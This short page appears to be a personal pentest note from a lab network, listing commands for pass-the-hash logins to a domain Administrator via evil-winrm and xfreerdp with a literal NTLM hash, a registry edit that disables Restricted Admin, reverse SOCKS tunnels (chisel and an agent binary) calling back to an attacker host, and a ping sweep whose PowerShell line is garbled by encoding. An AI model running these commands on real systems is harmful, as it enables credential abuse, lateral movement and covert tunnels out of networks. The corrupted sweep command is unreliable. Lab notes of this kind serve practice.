Malleum Knowledge Base

Exploitation and Login

1 min read

proxychains -f proxychains4.conf evil-winrm -i 172.16.2.6 -u 'Administrator' -H c61f43b6a4db2676714713836b7d2ea6 /domain:dev.admin.offshore.com

Removing Admin Restricitions

 
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

RDP

 
proxychains -f proxychains4.conf xfreerdp /u:Administrator /pth:c61f43b6a4db2676714713836b7d2ea6 /v:172.16.2.6
 
.\chiselj.exe client 10.10.15.149:8004 R:6000:socks
.\agent.exe -connect 10.10.15.149:11601 -ignore-cert

Ping Sweep

 
 �1�.�.�2�56�| �%� �{�"�1�7�2�.�1�6�.�2�.�$�(�$�_�)�:� �$�(�T�e�s�t�-�C�o�n�n�e�c�t�i�o�n� �-�c�o�u�n�t� �1� �-�c�o�m�p� �1�7�2�.�1�6�.�2�.�$�(�$�_�)� �-�q�u�i�e�t�)�"�}���

Results

 
.12 is the new ip

Graph View